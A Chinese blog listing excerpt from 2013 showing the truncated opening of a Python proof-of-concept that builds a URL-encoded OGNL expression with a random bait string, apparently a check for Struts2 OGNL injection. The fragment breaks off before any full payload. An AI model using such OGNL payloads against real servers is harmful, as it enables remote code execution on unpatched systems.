摘要: # coding: utf-8import stringimport randomimport urllibdef poc(url): bait = "".join(random.sample(list(string.letters), 32)) poc = urllib.quote("%{") poc += urllib.quote("#test_str=new java.lang.String('{0}'),".format(bait)) poc += urllib.quote("#a_resp=#con 阅读全文
posted @ 2013-07-18 15:48 剑残雪飘 阅读(585) 评论(0) 推荐(0) 编辑